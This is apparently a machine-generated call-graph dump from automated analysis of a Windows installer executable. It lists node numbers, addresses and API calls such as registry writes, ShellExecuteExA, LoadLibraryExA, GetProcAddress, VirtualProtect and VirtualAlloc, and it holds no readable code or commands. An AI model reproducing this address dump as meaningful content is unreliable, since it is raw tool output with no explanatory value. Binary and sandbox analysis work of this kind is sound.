4845->4846 4847 402bce 17 API calls 4846->4847 4848 402186 4847->4848 4849 402bce 17 API calls 4848->4849 4850 402193 4849->4850 4851 402bce 17 API calls 4850->4851 4852 40219d 4851->4852 4853 4021df CoCreateInstance 4852->4853 4854 402bce 17 API calls 4852->4854 4857 4021fe 4853->4857 4859 4022ac 4853->4859 4854->4853 4855 401423 24 API calls 4856 4022e2 4855->4856 4858 40228c MultiByteToWideChar 4857->4858 4857->4859 4858->4859 4859->4855 4859->4856 5187 4022eb 5188 402bce 17 API calls 5187->5188 5189 4022f1 5188->5189 5190 402bce 17 API calls 5189->5190 5191 4022fa 5190->5191 5192 402bce 17 API calls 5191->5192 5193 402303 5192->5193 5194 40646b 2 API calls 5193->5194 5195 40230c 5194->5195 5196 40231d lstrlenA lstrlenA 5195->5196 5200 402310 5195->5200 5198 40521e 24 API calls 5196->5198 5197 40521e 24 API calls 5201 402318 5197->5201 5199 402359 SHFileOperationA 5198->5199 5199->5200 5199->5201 5200->5197 5200->5201 4869 40266d 4870 402bac 17 API calls 4869->4870 4872 402677 4870->4872 4871 405d08 ReadFile 4871->4872 4872->4871 4873 4026e7 4872->4873 4874 4026f7 4872->4874 4876 4026e5 4872->4876 4878 406055 wsprintfA 4873->4878 4874->4876 4877 40270d SetFilePointer 4874->4877 4877->4876 4878->4876 5202 40236d 5203 402374 5202->5203 5206 402387 5202->5206 5204 40618a 17 API calls 5203->5204 5205 402381 5204->5205 5205->5206 5207 405813 MessageBoxIndirectA 5205->5207 5207->5206 5208 4019ed 5209 402bce 17 API calls 5208->5209 5210 4019f4 5209->5210 5211 402bce 17 API calls 5210->5211 5212 4019fd 5211->5212 5213 401a04 lstrcmpiA 5212->5213 5214 401a16 lstrcmpA 5212->5214 5215 401a0a 5213->5215 5214->5215 5216 6f951638 5217 6f951667 5216->5217 5218 6f951a98 18 API calls 5217->5218 5219 6f95166e 5218->5219 5220 6f951675 5219->5220 5221 6f951681 5219->5221 5222 6f951266 2 API calls 5220->5222 5223 6f9516a8 5221->5223 5224 6f95168b 5221->5224 5227 6f95167f 5222->5227 5225 6f9516d2 5223->5225 5226 6f9516ae 5223->5226 5228 6f9514e2 3 API calls 5224->5228 5230 6f9514e2 3 API calls 5225->5230 5229 6f951559 3 API calls 5226->5229 5231 6f951690 5228->5231 5232 6f9516b3 5229->5232 5230->5227 5233 6f951559 3 API calls 5231->5233 5234 6f951266 2 API calls 5232->5234 5235 6f951696 5233->5235 5236 6f9516b9 GlobalFree 5234->5236 5237 6f951266 2 API calls 5235->5237 5236->5227 5239 6f9516cd GlobalFree 5236->5239 5238 6f95169c GlobalFree 5237->5238 5238->5227 5239->5227 5240 40296e 5241 402bac 17 API calls 5240->5241 5242 402974 5241->5242 5243 4027bf 5242->5243 5244 4029af 5242->5244 5246 402986 5242->5246 5244->5243 5245 40618a 17 API calls 5244->5245 5245->5243 5246->5243 5248 406055 wsprintfA 5246->5248 5248->5243 4885 6f952921 4886 6f952971 4885->4886 4887 6f952931 VirtualProtect 4885->4887 4887->4886 5249 4014f4 SetForegroundWindow 5250 402a5a 5249->5250 4896 402476 4897 402bce 17 API calls 4896->4897 4898 402488 4897->4898 4899 402bce 17 API calls 4898->4899 4900 402492 4899->4900 4913 402c5e 4900->4913 4903 402a5a 4904 4024c7 4907 402bac 17 API calls 4904->4907 4909 4024d3 4904->4909 4905 402bce 17 API calls 4906 4024c0 lstrlenA 4905->4906 4906->4904 4907->4909 4908 4024f5 RegSetValueExA 4911 40250b RegCloseKey 4908->4911 4909->4908 4910 4030d8 31 API calls 4909->4910 4910->4908 4911->4903 4914 402c79 4913->4914 4917 405fab 4914->4917 4918 405fba 4917->4918 4919 4024a2 4918->4919 4920 405fc5 RegCreateKeyExA 4918->4920 4919->4903 4919->4904 4919->4905 4920->4919 5251 402777 5252 40277d 5251->5252 5253 402781 FindNextFileA 5252->5253 5256 402793 5252->5256 5254 4027d2 5253->5254 5253->5256 5257 4060f7 lstrcpynA 5254->5257 5257->5256 5258 401ef9 5259 402bce 17 API calls 5258->5259 5260 401eff 5259->5260 5261 402bce 17 API calls 5260->5261 5262 401f08 5261->5262 5263 402bce 17 API calls 5262->5263 5264 401f11 5263->5264 5265 402bce 17 API calls 5264->5265 5266 401f1a 5265->5266 5267 401423 24 API calls 5266->5267 5268 401f21 5267->5268 5275 4057d9 ShellExecuteExA 5268->5275 5270 401f5c 5271 406575 5 API calls 5270->5271 5273 4027bf 5270->5273 5272 401f76 CloseHandle 5271->5272 5272->5273 5275->5270 4921 401f7b 4922 402bce 17 API calls 4921->4922 4923 401f81 4922->4923 4924 40521e 24 API calls 4923->4924 4925 401f8b 4924->4925 4926 405796 2 API calls 4925->4926 4928 401f91 4926->4928 4927 4027bf 4928->4927 4929 401fb2 CloseHandle 4928->4929 4934 406575 WaitForSingleObject 4928->4934 4929->4927 4932 401fa6 4932->4929 4939 406055 wsprintfA 4932->4939 4935 40658f 4934->4935 4936 4065a1 GetExitCodeProcess 4935->4936 4937 40653c 2 API calls 4935->4937 4936->4932 4938 406596 WaitForSingleObject 4937->4938 4938->4935 4939->4929 5276 401ffb 5277 402bce 17 API calls 5276->5277 5278 402002 5277->5278 5279 406500 5 API calls 5278->5279 5280 402011 5279->5280 5281 402029 GlobalAlloc 5280->5281 5284 402091 5280->5284 5282 40203d 5281->5282 5281->5284 5283 406500 5 API calls 5282->5283 5285 402044 5283->5285 5286 406500 5 API calls 5285->5286 5287 40204e 5286->5287 5287->5284 5291 406055 wsprintfA 5287->5291 5289 402085 5292 406055 wsprintfA 5289->5292 5291->5289 5292->5284 5293 4018fd 5294 401934 5293->5294 5295 402bce 17 API calls 5294->5295 5296 401939 5295->5296 5297 4058bf 67 API calls 5296->5297 5298 401942 5297->5298 5299 401000 5300 401037 BeginPaint GetClientRect 5299->5300 5301 40100c DefWindowProcA 5299->5301 5302 4010f3 5300->5302 5306 401179 5301->5306 5304 401073 CreateBrushIndirect FillRect DeleteObject 5302->5304 5305 4010fc 5302->5305 5304->5302 5307 401102 CreateFontIndirectA 5305->5307 5308 401167 EndPaint 5305->5308 5307->5308 5309 401112 6 API calls 5307->5309 5308->5306 5309->5308 5310 401900 5311 402bce 17 API calls 5310->5311 5312 401907 5311->5312 5313 405813 MessageBoxIndirectA 5312->5313 5314 401910 5313->5314 5315 404b80 GetDlgItem GetDlgItem 5316 404bd6 7 API calls 5315->5316 5322 404dfd 5315->5322 5317 404c72 SendMessageA 5316->5317 5318 404c7e DeleteObject 5316->5318 5317->5318 5319 404c89 5318->5319 5320 404cc0 5319->5320 5325 40618a 17 API calls 5319->5325 5323 40417b 18 API calls 5320->5323 5321 404edf 5324 404f8b 5321->5324 5327 404df0 5321->5327 5333 404f38 SendMessageA 5321->5333 5322->5321 5349 404e6c 5322->5349 5369 404ace SendMessageA 5322->5369 5326 404cd4 5323->5326 5328 404f95 SendMessageA 5324->5328 5329 404f9d 5324->5329 5330 404ca2 SendMessageA SendMessageA 5325->5330 5332 40417b 18 API calls 5326->5332 5335 4041e2 8 API calls 5327->5335 5328->5329 5337 404fb6 5329->5337 5338 404faf ImageList_Destroy 5329->5338 5345 404fc6 5329->5345 5330->5319 5350 404ce5 5332->5350 5333->5327 5340 404f4d SendMessageA 5333->5340 5334 404ed1 SendMessageA 5334->5321 5336 40518b 5335->5336 5341 404fbf GlobalFree 5337->5341 5337->5345 5338->5337 5339 40513f 5339->5327 5346 405151 ShowWindow GetDlgItem ShowWindow 5339->5346 5343 404f60 5340->5343 5341->5345 5342 404dbf GetWindowLongA SetWindowLongA 5344 404dd8 5342->5344 5354 404f71 SendMessageA 5343->5354 5347 404df5 5344->5347 5348 404ddd ShowWindow 5344->5348 5345->5339 5361 405001 5345->5361 5374 404b4e 5345->5374 5346->5327 5368 4041b0 SendMessageA 5347->5368 5367 4041b0 SendMessageA 5348->5367 5349->5321 5349->5334 5350->5342 5353 404d37 SendMessageA 5350->5353 5355 404dba 5350->5355 5356 404d75 SendMessageA 5350->5356 5357 404d89 SendMessageA 5350->5357 5353->5350 5354->5324 5355->5342 5355->5344 5356->5350 5357->5350 5359 40510b 5360 405115 InvalidateRect 5359->5360 5363 405121 5359->5363 5360->5363 5362 40502f SendMessageA 5361->5362 5365 405045 5361->5365 5362->5365 5363->5339 5383 404a89 5363->5383 5364 4050b9 SendMessageA SendMessageA 5364->5365 5365->5359 5365->5364 5367->5327 5368->5322 5370 404af1 GetMessagePos ScreenToClient SendMessageA 5369->5370 5371 404b2d SendMessageA 5369->5371 5372 404b25 5370->5372 5373 404b2a 5370->5373 5371->5372 5372->5349 5373->5371 5386 4060f7 lstrcpynA 5374->5386 5376 404b61 5387 406055 wsprintfA 5376->5387 5378 404b6b 5379 40140b 2 API calls 5378->5379 5380 404b74 5379->5380 5388 4060f7 lstrcpynA 5380->5388 5382 404b7b 5382->5361 5389 4049c4 5383->5389 5385 404a9e 5385->5339 5386->5376 5387->5378 5388->5382 5391 4049da 5389->5391 5390 40618a 17 API calls 5392 404a3e 5390->5392 5391->5390 5393 40618a 17 API calls 5392->5393 5394 404a49 5393->5394 5395 40618a 17 API calls 5394->5395 5396 404a5f lstrlenA wsprintfA SetDlgItemTextA 5395->5396 5396->5385 5397 401502 5398 40150a 5397->5398 5400 40151d 5397->5400 5399 402bac 17 API calls 5398->5399 5399->5400 5401 402604 5402 402bce 17 API calls 5401->5402 5403 40260b 5402->5403 5406 405c90 GetFileAttributesA CreateFileA 5403->5406 5405 402617 5406->5405 5407 6f9515d1 5408 6f9514bb GlobalFree 5407->5408 5411 6f9515e9 5408->5411 5409 6f95162f GlobalFree 5410 6f951604 5410->5409 5411->5409 5411->5410 5412 6f95161b VirtualFree 5411->5412 5412->5409 5413 401b87 5414 401bd8 5413->5414 5417 401b94 5413->5417 5415 401c01 GlobalAlloc 5414->5415 5419 401bdc 5414->5419 5416 40618a 17 API calls 5415->5416 5420 401c1c 5416->5420 5417->5420 5421 401bab 5417->5421 5418 40618a 17 API calls 5422 402381 5418->5422 5427 402387 5419->5427 5434 4060f7 lstrcpynA 5419->5434 5420->5418 5420->5427 5432 4060f7 lstrcpynA 5421->5432 5422->5427 5428 405813 MessageBoxIndirectA 5422->5428 5425 401bee GlobalFree 5425->5427 5426 401bba 5433 4060f7 lstrcpynA 5426->5433 5428->5427 5430 401bc9 5435 4060f7 lstrcpynA 5430->5435 5432->5426 5433->5430 5434->5425 5435->5427 4372 402588 4384 402c0e 4372->4384 4375 402bac 17 API calls 4376 40259b 4375->4376 4377 4025a9 4376->4377 4381 4027bf 4376->4381 4378 4025c2 RegEnumValueA 4377->4378 4379 4025b6 RegEnumKeyA 4377->4379 4380 4025de RegCloseKey 4378->4380 4382 4025d7 4378->4382 4379->4380 4380->4381 4382->4380 4385 402bce 17 API calls 4384->4385 4386 402c25 4385->4386 4387 405f7d RegOpenKeyExA 4386->4387 4388 402592 4387->4388 4388->4375 5436 40460d 5437 404639 5436->5437 5438 40464a 5436->5438 5497 4057f7 GetDlgItemTextA 5437->5497 5440 404656 GetDlgItem 5438->5440 5447 4046b5 5438->5447 5442 40466a 5440->5442 5441 404644 5444 4063d2 5 API calls 5441->5444 5445 40467e SetWindowTextA 5442->5445 5450 405b28 4 API calls 5442->5450 5443 404799 5446 404943 5443->5446 5499 4057f7 GetDlgItemTextA 5443->5499 5444->5438 5451 40417b 18 API calls 5445->5451 5449 4041e2 8 API calls 5446->5449 5447->5443 5447->5446 5452 40618a 17 API calls 5447->5452 5454 404957 5449->5454 5455 404674 5450->5455 5456 40469a 5451->5456 5457 404729 SHBrowseForFolderA 5452->5457 5453 4047c9 5458 405b7d 18 API calls 5453->5458 5455->5445 5464 405a8f 3 API calls 5455->5464 5459 40417b 18 API calls 5456->5459 5457->5443 5460 404741 CoTaskMemFree 5457->5460 5461 4047cf 5458->5461 5462 4046a8 5459->5462 5463 405a8f 3 API calls 5460->5463 5500 4060f7 lstrcpynA 5461->5500 5498 4041b0 SendMessageA 5462->5498 5466 40474e 5463->5466 5464->5445 5469 404785 SetDlgItemTextA 5466->5469 5473 40618a 17 API calls 5466->5473 5468 4046ae 5471 406500 5 API calls 5468->5471 5469->5443 5470 4047e6 5472 406500 5 API calls 5470->5472 5471->5447 5480 4047ed 5472->5480 5474 40476d lstrcmpiA 5473->5474 5474->5469 5477 40477e lstrcatA 5474->5477 5475 404829 5501 4060f7 lstrcpynA 5475->5501 5477->5469 5478 404830 5479 405b28 4 API calls 5478->5479 5481 404836 GetDiskFreeSpaceA 5479->5481 5480->5475 5484 405ad6 2 API calls 5480->5484 5486 404881 5480->5486 5483 40485a MulDiv 5481->5483 5481->5486 5483->5486 5484->5480 5485 4048f2 5488 404915 5485->5488 5490 40140b 2 API calls 5485->5490 5486->5485 5487 404a89 20 API calls 5486->5487 5489 4048df 5487->5489 5502 40419d KiUserCallbackDispatcher 5488->5502 5492 4048f4 SetDlgItemTextA 5489->5492 5493 4048e4 5489->5493 5490->5488 5492->5485 5495 4049c4 20 API calls 5493->5495 5494 404931 5494->5446 5496 404566 SendMessageA 5494->5496 5495->5485 5496->5446 5497->5441 5498->5468 5499->5453 5500->5470 5501->5478 5502->5494 5503 6f951058 5505 6f951074 5503->5505 5504 6f9510dc 5505->5504 5506 6f951091 5505->5506 5507 6f9514bb GlobalFree 5505->5507 5508 6f9514bb GlobalFree 5506->5508 5507->5506 5509 6f9510a1 5508->5509 5510 6f9510b1 5509->5510 5511 6f9510a8 GlobalSize 5509->5511 5512 6f9510b5 GlobalAlloc 5510->5512 5513 6f9510c6 5510->5513 5511->5510 5514 6f9514e2 3 API calls 5512->5514 5515 6f9510d1 GlobalFree 5513->5515 5514->5513 5515->5504 5516 6f95225a 5517 6f9522c4 5516->5517 5518 6f9522cf GlobalAlloc 5517->5518 5519 6f9522ee 5517->5519 5518->5517 5520 401490 5521 40521e 24 API calls 5520->5521 5522 401497 5521->5522 5523 405192 5524 4051a2 5523->5524 5525 4051b6 5523->5525 5527 4051a8 5524->5527 5535 4051ff 5524->5535 5526 4051be IsWindowVisible 5525->5526 5533 4051d5 5525->5533 5529 4051cb 5526->5529 5526->5535 5528 4041c7 SendMessageA 5527->5528 5531 4051b2 5528->5531 5532 404ace 5 API calls 5529->5532 5530 405204 CallWindowProcA 5530->5531 5532->5533 5533->5530 5534 404b4e 4 API calls 5533->5534 5534->5535 5535->5530 5536 402516 5537 402c0e 17 API calls 5536->5537 5538 402520 5537->5538 5539 402bce 17 API calls 5538->5539 5540 402529 5539->5540 5541 402533 RegQueryValueExA 5540->5541 5545 4027bf 5540->5545 5542 402559 RegCloseKey 5541->5542 5543 402553 5541->5543 5542->5545 5543->5542 5547 406055 wsprintfA 5543->5547 5547->5542 4508 40239c 4509 4023a4 4508->4509 4510 4023aa 4508->4510 4511 402bce 17 API calls 4509->4511 4512 4023ba 4510->4512 4513 402bce 17 API calls 4510->4513 4511->4510 4514 4023c8 4512->4514 4515 402bce 17 API calls 4512->4515 4513->4512 4516 402bce 17 API calls 4514->4516 4515->4514 4517 4023d1 WritePrivateProfileStringA 4516->4517 4518 40209d 4519 4020af 4518->4519 4520 40215d 4518->4520 4521 402bce 17 API calls 4519->4521 4522 401423 24 API calls 4520->4522 4523 4020b6 4521->4523 4528 4022e2 4522->4528 4524 402bce 17 API calls 4523->4524 4525 4020bf 4524->4525 4526 4020d4 LoadLibraryExA 4525->4526 4527 4020c7 GetModuleHandleA 4525->4527 4526->4520 4529 4020e4 GetProcAddress 4526->4529 4527->4526 4527->4529 4530 402130 4529->4530 4531 4020f3 4529->4531 4532 40521e 24 API calls 4530->4532 4533 402112 4531->4533 4534 4020fb 4531->4534 4536 402103 4532->4536 4539 6f9516db 4533->4539 4581 401423 4534->4581 4536->4528 4537 402151 FreeLibrary 4536->4537 4537->4528 4540 6f95170b 4539->4540 4584 6f951a98 4540->4584 4542 6f951712 4543 6f951834 4542->4543 4544 6f951723 4542->4544 4545 6f95172a 4542->4545 4543->4536 4633 6f9522af 4544->4633 4616 6f9522f1 4545->4616 4550 6f95174f 4553 6f951770 4550->4553 4554 6f95178e 4550->4554 4551 6f951740 4556 6f951746 4551->4556 4560 6f951751 4551->4560 4552 6f951759 4552->4550 4643 6f952cc3 4552->4643 4646 6f9524d8 4553->4646 4557 6f951794 4554->4557 4558 6f9517dc 4554->4558 4556->4550 4627 6f952a38 4556->4627 4665 6f95156b 4557->4665 4564 6f9524d8 11 API calls 4558->4564 4559 6f951776 4657 6f951559 4559->4657 4637 6f9526b2 4560->4637 4568 6f9517cd 4564->4568 4572 6f951823 4568->4572 4671 6f95249e 4568->4671 4570 6f951757 4570->4550 4571 6f9524d8 11 API calls 4571->4568 4572->4543 4576 6f95182d GlobalFree 4572->4576 4576->4543 4578 6f95180f 4578->4572 4675 6f9514e2 wsprintfA 4578->4675 4579 6f951808 FreeLibrary 4579->4578 4582 40521e 24 API calls 4581->4582 4583 401431 4582->4583 4583->4536 4678 6f951215 GlobalAlloc 4584->4678 4586 6f951abf 4679 6f951215 GlobalAlloc 4586->4679 4588 6f951d00 GlobalFree GlobalFree GlobalFree 4589 6f951d1d 4588->4589 4600 6f951d67 4588->4600 4590 6f9520f1 4589->4590 4598 6f951d32 4589->4598 4589->4600 4592 6f952113 GetModuleHandleA 4590->4592 4590->4600 4591 6f951bbd GlobalAlloc 4610 6f951aca 4591->4610 4595 6f952124 LoadLibraryA 4592->4595 4596 6f952139 4592->4596 4593 6f951c08 lstrcpyA 4597 6f951c12 lstrcpyA 4593->4597 4594 6f951c26 GlobalFree 4594->4610 4595->4596 4595->4600 4686 6f9515c2 GetProcAddress 4596->4686 4597->4610 4598->4600 4682 6f951224 4598->4682 4600->4542 4601 6f95218a 4601->4600 4605 6f952197 lstrlenA 4601->4605 4602 6f951fb7 4685 6f951215 GlobalAlloc 4602->4685 4687 6f9515c2 GetProcAddress 4605->4687 4606 6f951ef9 GlobalFree 4606->4610 4607 6f952033 4607->4600 4613 6f95208c lstrcpyA 4607->4613 4608 6f95214b 4608->4601 4614 6f952174 GetProcAddress 4608->4614 4610->4588 4610->4591 4610->4593 4610->4594 4610->4597 4610->4600 4610->4602 4610->4606 4610->4607 4611 6f951224 2 API calls 4610->4611 4680 6f951534 GlobalSize GlobalAlloc 4610->4680 4611->4610 4613->4600 4614->4601 4615 6f951fbf 4615->4542 4624 6f95230a 4616->4624 4617 6f951224 GlobalAlloc lstrcpynA 4617->4624 4619 6f952446 GlobalFree 4621 6f951730 4619->4621 4619->4624 4620 6f9523b8 GlobalAlloc MultiByteToWideChar 4622 6f952405 4620->4622 4623 6f9523e4 GlobalAlloc 4620->4623 4621->4550 4621->4551 4621->4552 4622->4619 4693 6f952646 4622->4693 4625 6f9523fc GlobalFree 4623->4625 4624->4617 4624->4619 4624->4620 4624->4622 4689 6f9512ad 4624->4689 4625->4619 4629 6f952a4a 4627->4629 4628 6f952aef SetFilePointer 4630 6f952b0d 4628->4630 4629->4628 4696 6f9529e4 4630->4696 4632 6f952bd9 4632->4550 4634 6f9522c4 4633->4634 4635 6f9522cf GlobalAlloc 4634->4635 4636 6f951729 4634->4636 4635->4634 4636->4545 4641 6f9526e2 4637->4641 4638 6f952790 4640 6f952796 GlobalSize 4638->4640 4642 6f9527a0 4638->4642 4639 6f95277d GlobalAlloc 4639->4642 4640->4642 4641->4638 4641->4639 4642->4570 4644 6f952cce 4643->4644 4645 6f952d0e GlobalFree 4644->4645 4700 6f951215 GlobalAlloc 4646->4700 4648 6f952574 StringFromGUID2 WideCharToMultiByte 4653 6f9524e4 4648->4653 4649 6f952563 lstrcpynA 4649->4653 4650 6f952598 WideCharToMultiByte 4650->4653 4651 6f9525b9 wsprintfA 4651->4653 4652 6f9525dd GlobalFree 4652->4653 4653->4648 4653->4649 4653->4650 4653->4651 4653->4652 4654 6f952617 GlobalFree 4653->4654 4655 6f951266 2 API calls 4653->4655 4701 6f9512d1 4653->4701 4654->4559 4655->4653 4705 6f951215 GlobalAlloc 4657->4705 4659 6f95155e 4660 6f95156b 2 API calls 4659->4660 4661 6f951568 4660->4661 4662 6f951266 4661->4662 4663 6f95126f GlobalAlloc lstrcpynA 4662->4663 4664 6f9512a8 GlobalFree 4662->4664 4663->4664 4664->4568 4666 6f951577 wsprintfA 4665->4666 4669 6f9515a4 lstrcpyA 4665->4669 4670 6f9515bd 4666->4670 4669->4670 4670->4571 4672 6f9517ef 4671->4672 4673 6f9524ac 4671->4673 4672->4578 4672->4579 4673->4672 4674 6f9524c5 GlobalFree 4673->4674 4674->4673 4676 6f951266 2 API calls 4675->4676 4677 6f951503 4676->4677 4677->4572 4678->4586 4679->4610 4681 6f951552 4680->4681 4681->4610 4688 6f951215 GlobalAlloc 4682->4688 4684 6f951233 lstrcpynA 4684->4600 4685->4615 4686->4608 4687->4600 4688->4684 4690 6f9512b4 4689->4690 4691 6f951224 2 API calls 4690->4691 4692 6f9512cf 4691->4692 4692->4624 4694 6f952654 VirtualAlloc 4693->4694 4695 6f9526aa 4693->4695 4694->4695 4695->4622 4697 6f9529ef 4696->4697 4698 6f9529f4 GetLastError 4697->4698 4699 6f9529ff 4697->4699 4698->4699 4699->4632 4700->4653 4702 6f9512f9 4701->4702 4703 6f9512da 4701->4703 4702->4653 4703->4702 4704 6f9512e0 lstrcpyA 4703->4704 4704->4702 4705->4659 4706 40159d 4707 402bce 17 API calls 4706->4707 4708 4015a4 SetFileAttributesA 4707->4708 4709 4015b6 4708->4709 5548 40149d 5549 4014ab PostQuitMessage 5548->5549 5550 402387 5548->5550 5549->5550 4710 401a1e 4711 402bce 17 API calls 4710->4711 4712 401a27 ExpandEnvironmentStringsA 4711->4712 4713 401a3b 4712->4713 4715 401a4e 4712->4715 4714 401a40 lstrcmpA 4713->4714 4713->4715 4714->4715 4716 40171f 4717 402bce 17 API calls 4716->4717 4718 401726 SearchPathA 4717->4718 4719 401741 4718->4719 5556 401d1f 5557 402bac 17 API calls 5556->5557 5558 401d26 5557->5558 5559 402bac 17 API calls 5558->5559 5560 401d32 GetDlgItem 5559->5560 5561 402620 5560->5561 4720 402421 4721 402453 4720->4721 4722 402428 4720->4722 4724 402bce 17 API calls 4721->4724 4723 402c0e 17 API calls 4722->4723 4725 40242f 4723->4725 4726 40245a 4724->4726 4727 402439 4725->4727 4730 402467 4725->4730 4732 402c8c 4726->4732 4729 402bce 17 API calls 4727->4729 4731 402440 RegDeleteValueA RegCloseKey 4729->4731 4731->4730 4733 402c9f 4732->4733 4734 402c98 4732->4734 4733->4734 4736 402cd0 4733->4736 4734->4730 4737 405f7d RegOpenKeyExA 4736->4737 4738 402cfe 4737->4738 4739 402d0e RegEnumValueA 4738->4739 4746 402da8 4738->4746 4748 402d31 4738->4748 4740 402d98 RegCloseKey 4739->4740 4739->4748 4740->4746 4741 402d6d RegEnumKeyA 4742 402d76 RegCloseKey 4741->4742 4741->4748 4743 406500 5 API calls 4742->4743 4744 402d86 4743->4744 4744->4746 4747 402d8a RegDeleteKeyA 4744->4747 4745 402cd0 6 API calls 4745->4748 4746->4734 4747->4746 4748->4740 4748->4741 4748->4742 4748->4745 4749 4027a1 4750 402bce 17 API calls 4749->4750 4751 4027a8 FindFirstFileA 4750->4751 4752 4027cb 4751->4752 4753 4027bb 4751->4753 4754 4027d2 4752->4754 4757 406055 wsprintfA 4752->4757 4758 4060f7 lstrcpynA 4754->4758 4757->4754 4758->4753 4759 402626 4760 40262b 4759->4760 4761 40263f 4759->4761 4762 402bac 17 API calls 4760->4762 4763 402bce 17 API calls 4761->4763 4764 402634 4762->4764 4765 402646 lstrlenA 4763->4765 4766 405d37 WriteFile 4764->4766 4767 402668 4764->4767 4765->4764 4766->4767 4768 403ca7 4769 403dfa 4768->4769 4770 403cbf 4768->4770 4772 403e4b 4769->4772 4773 403e0b GetDlgItem GetDlgItem 4769->4773 4770->4769 4771 403ccb 4770->4771 4774 403cd6 SetWindowPos 4771->4774 4775 403ce9 4771->4775 4777 403ea5 4772->4777 4785 401389 2 API calls 4772->4785 4776 40417b 18 API calls 4773->4776 4774->4775 4779 403d06 4775->4779 4780 403cee ShowWindow 4775->4780 4781 403e35 SetClassLongA 4776->4781 4778 4041c7 SendMessageA 4777->4778 4798 403df5 4777->4798 4796 403eb7 4778->4796 4782 403d28 4779->4782 4783 403d0e DestroyWindow 4779->4783 4780->4779 4784 40140b 2 API calls 4781->4784 4786 403d2d SetWindowLongA 4782->4786 4787 403d3e 4782->4787 4838 404104 4783->4838 4784->4772 4788 403e7d 4785->4788 4786->4798 4791 403de7 4787->4791 4792 403d4a GetDlgItem 4787->4792 4788->4777 4793 403e81 SendMessageA 4788->4793 4789 40140b 2 API calls 4789->4796 4790 404106 DestroyWindow EndDialog 4790->4838 4794 4041e2 8 API calls 4791->4794 4797 403d5d SendMessageA IsWindowEnabled 4792->4797 4801 403d7a 4792->4801 4793->4798 4794->4798 4795 404135 ShowWindow 4795->4798 4796->4789 4796->4790 4796->4798 4799 40618a 17 API calls 4796->4799 4806 40417b 18 API calls 4796->4806 4813 40417b 18 API calls 4796->4813 4829 404046 DestroyWindow 4796->4829 4797->4798 4797->4801 4799->4796 4800 403d7f 4805 404154 SendMessageA 4800->4805 4801->4800 4802 403d87 4801->4802 4803 403dce SendMessageA 4801->4803 4804 403d9a 4801->4804 4802->4800 4802->4803 4803->4791 4807 403da2 4804->4807 4808 403db7 4804->4808 4809 403db5 4805->4809 4806->4796 4810 40140b 2 API calls 4807->4810 4811 40140b 2 API calls 4808->4811 4809->4791 4810->4800 4812 403dbe 4811->4812 4812->4791 4812->4800 4814 403f32 GetDlgItem 4813->4814 4815 403f47 4814->4815 4816 403f4f ShowWindow KiUserCallbackDispatcher 4814->4816 4815->4816 4839 40419d KiUserCallbackDispatcher 4816->4839 4818 403f79 EnableWindow 4823 403f8d 4818->4823 4819 403f92 GetSystemMenu EnableMenuItem SendMessageA 4820 403fc2 SendMessageA 4819->4820 4819->4823 4820->4823 4822 403c88 18 API calls 4822->4823 4823->4819 4823->4822 4840 4041b0 SendMessageA 4823->4840 4841 4060f7 lstrcpynA 4823->4841 4825 403ff1 lstrlenA 4826 40618a 17 API calls 4825->4826 4827 404002 SetWindowTextA 4826->4827 4828 401389 2 API calls 4827->4828 4828->4796 4830 404060 CreateDialogParamA 4829->4830 4829->4838 4831 404093 4830->4831 4830->4838 4832 40417b 18 API calls 4831->4832 4833 40409e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4832->4833 4834 401389 2 API calls 4833->4834 4835 4040e4 4834->4835 4835->4798 4836 4040ec ShowWindow 4835->4836 4837 4041c7 SendMessageA 4836->4837 4837->4838 4838->4795 4838->4798 4839->4818 4840->4823 4841->4825 4860 40272b 4861 402732 4860->4861 4862 4029aa 4860->4862 4863 402bac 17 API calls 4861->4863 4864 402739 4863->4864 4865 402748 SetFilePointer 4864->4865 4865->4862 4866 402758 4865->4866 4868 406055 wsprintfA 4866->4868 4868->4862 5562 401c2e 5563 402bac 17 API calls 5562->5563 5564 401c35 5563->5564 5565 402bac 17 API calls 5564->5565 5566 401c42 5565->5566 5567 402bce 17 API calls 5566->5567 5568 401c57 5566->5568 5567->5568 5569 401c67 5568->5569 5570 402bce 17 API calls 5568->5570 5571 401c72 5569->5571 5572 401cbe 5569->5572 5570->5569 5573 402bac 17 API calls 5571->5573 5574 402bce 17 API calls 5572->5574 5575 401c77 5573->5575 5576 401cc3 5574->5576 5577 402bac 17 API calls 5575->5577 5578 402bce 17 API calls 5576->5578 5579 401c83 5577->5579 5580 401ccc FindWindowExA 5578->5580 5581 401c90 SendMessageTimeoutA 5579->5581 5582 401cae SendMessageA 5579->5582 5583 401cea 5580->5583 5581->5583 5582->5583 5584 4042b1 lstrcpynA lstrlenA 4888 401e35 GetDC 4889 402bac 17 API calls 4888->4889 4890 401e47 GetDeviceCaps MulDiv ReleaseDC 4889->4890 4891 402bac 17 API calls 4890->4891 4892 401e78 4891->4892 4893 40618a 17 API calls 4892->4893 4894 401eb5 CreateFontIndirectA 4893->4894 4895 402620 4894->4895 5585 402a35 SendMessageA 5586 402a5a 5585->5586 5587 402a4f InvalidateRect 5585->5587 5587->5586 5588 6f9510e0 5597 6f95110e 5588->5597 5589 6f9511c4 GlobalFree 5590 6f9512ad 2 API calls 5590->5597 5591 6f9511c3 5591->5589 5592 6f9511ea GlobalFree 5592->5597 5593 6f951266 2 API calls 5596 6f9511b1 GlobalFree 5593->5596 5594 6f951155 GlobalAlloc 5594->5597 5595 6f9512d1 lstrcpyA 5595->5597 5596->5597 5597->5589 5597->5590 5597->5591 5597->5592 5597->5593 5597->5594 5597->5595 5597->5596 5598 6f952be3 5599 6f952bfb 5598->5599 5600 6f951534 2 API calls 5599->5600 5601 6f952c16 5600->5601 5602 4014b7 5603 4014bd 5602->5603 5604 401389 2 API calls 5603->5604 5605 4014c5 5604->5605 5606 402dba 5607 402dc9 SetTimer 5606->5607 5609 402de2 5606->5609 5607->5609 5608 402e37 5609->5608 5610 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5609->5610 5610->5608 4940 4015bb 4941 402bce 17 API calls 4940->4941 4942 4015c2 4941->4942 4943 405b28 4 API calls 4942->4943 4957 4015ca 4943->4957 4944 401624 4946 401652 4944->4946 4947 401629 4944->4947 4945 405aba CharNextA 4945->4957 4949 401423 24 API calls 4946->4949 4948 401423 24 API calls 4947->4948 4950 401630 4948->4950 4956 40164a 4949->4956 4959 4060f7 lstrcpynA 4950->4959 4951 405761 2 API calls 4951->4957 4953 40577e 5 API calls 4953->4957 4954 40163b SetCurrentDirectoryA 4954->4956 4955 40160c GetFileAttributesA 4955->4957 4957->4944 4957->4945 4957->4951 4957->4953 4957->4955 4958 4056e4 4 API calls 